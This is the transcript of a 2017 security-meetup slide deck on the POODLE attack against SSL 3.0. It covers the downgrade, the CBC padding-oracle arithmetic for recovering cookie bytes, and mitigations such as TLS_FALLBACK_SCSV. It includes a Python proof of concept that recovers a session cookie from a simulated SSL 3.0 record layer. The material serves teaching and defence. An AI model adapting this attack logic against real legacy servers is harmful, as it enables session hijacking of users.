


Published at: Null Meet Talk, 18/3/2017

Published in: Engineering


  1. POODLE
     This POODLE Bites: Exploiting The SSL 3.0 Fallback (Bodo Möller, Thai Duong, Krzysztof Kotowicz)
     Presented by: Samit Anwer
  2. Padding Oracle On Downgraded Legacy Encryption
     • If an attacker interferes with a handshake offering TLS 1.0 or later, clients that implement the protocol downgrade dance retry with SSL 3.0
     • Encryption in SSL 3.0 uses either the RC4 stream cipher or a block cipher (AES/DES) in CBC mode
     • We use AES in CBC mode as the running example
     • Assumption: the attacker can modify network transmissions between client and server
  3. Attack Scenario
     • The attacker sends the victim a link (http://evil.com)
     • When the victim visits the link, the JavaScript embedded on evil.com starts making cookie-bearing requests to https://example.com
     • An HTTP request looks like: POST /path <CR><LF> Cookie: name=value ... <CR><LF><CR><LF> body
     • The attacker can MITM the encrypted traffic and controls the data in "path" and "body" (but not the cookie)
  4. Cipher Block Chaining Encryption
     • Record layout before encryption: POST /path Cookie: name=value ... <CR><LF><CR><LF> body ‖ 20-byte MAC ‖ padding
     • The record is split into plaintext blocks P1, P2, ..., Pi, ..., Pn-1, Pn and encrypted into ciphertext blocks C1, C2, ..., Ci, ..., Cn-1, Cn
     • Ci = EK(Pi ⊕ Ci-1), with C0 = IV
     • AES block size is 16 bytes; DES block size is 8 bytes
  5. Cipher Block Chaining Decryption
     • Pi = DK(Ci) ⊕ Ci-1, with C0 = IV
     • Decrypting C1, ..., Ci, ..., Cn recovers P1, ..., Pi, ..., Pn, i.e. POST /path Cookie: name=value ... <CR><LF><CR><LF> body ‖ 20-byte MAC ‖ padding
     • Note that a change to one ciphertext block Ci only affects the plaintext blocks Pi and Pi+1
  6. The Attack
     • Record: POST /path Cookie: sessionid=value ... <CR><LF><CR><LF> body ‖ 20-byte MAC ‖ padding
     • Padding of 1 to L bytes (where L is the block size in bytes) is appended so the record is block-aligned before blockwise CBC; the last padding byte is the padding length, and in SSL 3.0 the other padding bytes are not checked
     • The attacker controls the request path and request body, and hence can shape requests such that:
       1. The padding fills an entire block (encrypted into Cn)
       2. The cookie's first (as yet unknown) byte appears as the final byte of an earlier block (encrypted into Ci)
     • The attacker then replaces Cn by the earlier ciphertext block Ci
     • The ciphertext is accepted if DK(Ci) ⊕ Cn-1 happens to have 15 as its final byte (the server strips a full block of padding and the MAC still verifies)
     • Otherwise it is rejected, giving rise to a padding oracle attack
  7. Attack Contd.
     Assuming L = 16 (AES). From CBC decryption we know:
       Pi = DK(Ci) ⊕ Ci-1, so for the last block Pn = DK(Cn) ⊕ Cn-1
       Pn[15] = DK(Cn)[15] ⊕ Cn-1[15] ----- (a)
     After Cn is replaced by Ci and the ciphertext is accepted, the server saw 15 as the final byte, so from (a):
       15 = DK(Ci)[15] ⊕ Cn-1[15], i.e. DK(Ci)[15] = 15 ⊕ Cn-1[15] ----- (1)
     We also know Pi = DK(Ci) ⊕ Ci-1, and hence
       Pi[15] = DK(Ci)[15] ⊕ Ci-1[15] ----- (2)
     Substituting DK(Ci)[15] from (1) into (2):
       Pi[15] = 15 ⊕ Cn-1[15] ⊕ Ci-1[15]
     Pi[15] is the unknown cookie byte; Cn-1[15] and Ci-1[15] are known to the attacker from the ciphertext.
  8. Overall Effort
     • Each trial succeeds with probability 1/256, so on average 256 SSL 3.0 requests are needed per recovered byte
     • After recovering a byte, the attacker shifts the request by one byte (one more byte of path, one less of body) and repeats for the next cookie byte
     Problem with SSL 3.0 in CBC mode: the integrity of the padding cannot be verified when decrypting, as it is not covered by the MAC and its content is not deterministic
     Recommendation
     • Disable the SSL 3.0 protocol in the client, in the server, or both
     • TLS_FALLBACK_SCSV: when an incoming connection includes {0x56, 0x00} (TLS_FALLBACK_SCSV) in ClientHello.cipher_suites, the server compares ClientHello.client_version to the highest protocol version it supports. If the server supports a version higher than the one indicated by the client, it rejects the connection (inappropriate_fallback alert), so a downgraded retry cannot succeed
  9. Demo Overview
     src: https://patzke.org/implementing-the-poodle-attack.html
  10. Attack Steps
     • Downgrade the connection to SSLv3 by disrupting the TLS handshake attempts
     • Adjust the URL and POST body lengths such that the last block of the ciphertext is entirely padding and the target cookie byte is the last byte of a block
     • Copy Ci over Cn in every generated SSL 3.0 record and compute the leaked byte (15 ⊕ Cn-1[15] ⊕ Ci-1[15]) whenever the server accepts the modified record
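The following is an added example for slides 6, 7 and 10, not code from the talk or from the referenced paper. It simulates an SSL 3.0-style CBC record layer (payload ‖ 20-byte MAC ‖ padding with an unchecked body and a trailing length byte), a victim that sends cookie-bearing requests with attacker-chosen path and body, and a server that answers accept/reject. The attacker finds the body length that makes the padding a full block by watching the ciphertext length jump, copies Ci over Cn, and recovers Pi[15] = 15 ⊕ Cn-1[15] ⊕ Ci-1[15] on acceptance. Assumptions: the block cipher is a stand-in keyed Feistel network over SHA-256 (the attack only depends on CBC, not on AES), the MAC is HMAC-SHA1 standing in for the SSL 3.0 MAC, and the number of cookie bytes to recover is given to the attacker.

```python
"""POODLE against an SSL 3.0-style CBC record layer: recover a cookie byte by byte.

Added example; the primitives below are stand-ins chosen so the demo runs with
the standard library only.
"""
import hashlib
import hmac
import os

BLOCK = 16    # block size L in bytes (AES)
MAC_LEN = 20  # SSL 3.0 carries a 20-byte MAC after the payload
ROUNDS = 8

# Attacker-controlled path sits between these two fixed request fragments
# (constructed request shape, mirroring slide 3).
PREFIX = b"POST /"
SUFFIX = b" HTTP/1.0\r\nCookie: sessionid="


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, r, half):
    # Round function of the stand-in cipher (assumption: any keyed block cipher works).
    return hashlib.sha256(key + bytes([r]) + half).digest()[:8]


def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for i in range(ROUNDS):
        l, r = r, _xor(l, _f(key, i, r))
    return l + r


def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(ROUNDS)):
        l, r = _xor(r, _f(key, i, l)), l
    return l + r


def ssl3_seal(key, mac_key, iv, payload):
    """Client side: payload || MAC || padding || padlen, then CBC (slide 4)."""
    body = payload + hmac.new(mac_key, payload, hashlib.sha1).digest()
    padlen = (BLOCK - 1 - len(body)) % BLOCK       # 15 => padding fills a whole block
    body += os.urandom(padlen) + bytes([padlen])    # SSL 3.0 padding bytes are arbitrary
    out, prev = b"", iv
    for i in range(0, len(body), BLOCK):
        prev = block_encrypt(key, _xor(body[i:i + BLOCK], prev))   # Ci = EK(Pi xor Ci-1)
        out += prev
    return out


def ssl3_open_ok(key, mac_key, iv, record):
    """Server side: True iff the record is accepted. This is the padding oracle."""
    plain, prev = b"", iv
    for i in range(0, len(record), BLOCK):
        c = record[i:i + BLOCK]
        plain += _xor(block_decrypt(key, c), prev)                  # Pi = DK(Ci) xor Ci-1
        prev = c
    padlen = plain[-1]
    if padlen >= BLOCK or padlen + 1 + MAC_LEN > len(plain):
        return False
    body = plain[:-(padlen + 1)]   # padding content is never checked: the SSL 3.0 flaw
    data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(mac, hmac.new(mac_key, data, hashlib.sha1).digest())


def make_victim(key, mac_key, cookie):
    """Models evil.com's JavaScript: attacker picks path and body, the browser adds
    the secret cookie, and a fresh SSL 3.0 record goes out (slide 3)."""
    def victim(path, body):
        request = PREFIX + path + SUFFIX + cookie + b"\r\n\r\n" + body
        iv = os.urandom(BLOCK)   # SSL 3.0 chains IVs across records, so the attacker knows it
        return iv, ssl3_seal(key, mac_key, iv, request)
    return victim


def make_oracle(key, mac_key):
    return lambda iv, record: ssl3_open_ok(key, mac_key, iv, record)


def body_len_for_full_padding(victim, path):
    """Grow the body until the ciphertext grows by a block: at that body length the
    padding is exactly L bytes, so the last block is all padding (slide 6, point 1)."""
    lens = [len(victim(path, b"A" * b)[1]) for b in range(BLOCK + 1)]
    for b in range(1, BLOCK + 1):
        if lens[b] > lens[b - 1]:
            return b
    raise RuntimeError("no length jump observed")


def poodle_recover(victim, oracle, n_bytes):
    """Recover the first n_bytes of the cookie; ~256 records per byte on average."""
    recovered, queries = bytearray(), 0
    fixed = len(PREFIX) + len(SUFFIX)
    for k in range(n_bytes):
        # Path length puts cookie byte k at the last position of some block (slide 6, point 2).
        path_len = (-(fixed + k + 1)) % BLOCK
        path = b"a" * path_len
        body = b"A" * body_len_for_full_padding(victim, path)
        blk = (fixed + path_len + k) // BLOCK        # 0-based index of the block Ci
        while True:
            iv, ct = victim(path, body)
            blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
            n = len(blocks)
            blocks[n - 1] = blocks[blk]               # replace Cn by Ci
            queries += 1
            if oracle(iv, b"".join(blocks)):
                # Accepted => DK(Ci)[15] xor Cn-1[15] == 15, hence (slide 7)
                # Pi[15] = 15 xor Cn-1[15] xor Ci-1[15]
                prev = blocks[blk - 1] if blk else iv
                recovered.append(15 ^ blocks[n - 2][15] ^ prev[15])
                break
    return bytes(recovered), queries


def demo(cookie=b"SECRET"):
    key, mac_key = os.urandom(16), os.urandom(20)   # unknown to the attacker
    got, queries = poodle_recover(make_victim(key, mac_key, cookie),
                                  make_oracle(key, mac_key), len(cookie))
    return got, queries


if __name__ == "__main__":
    got, q = demo()
    print(f"recovered {got!r} after {q} oracle queries")
```

The attacker never touches the key: every query is a fresh, genuine record from the victim with one block overwritten, and the only signal is the server's accept/reject decision. Note that the same code with a TLS 1.0+ record layer would fail, because those versions check every padding byte and the copied block would be rejected regardless of its last byte.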
  11. References
     • This POODLE Bites: Exploiting The SSL 3.0 Fallback, Bodo Möller, Thai Duong, Krzysztof Kotowicz, https://www.openssl.org/~bodo/ssl-poodle.pdf
     • Attack of the week: POODLE, https://blog.cryptographyengineering.com/2014/10/15/attack-of-week-poodle/
     • Implementing the POODLE Attack, https://patzke.org/implementing-the-poodle-attack.html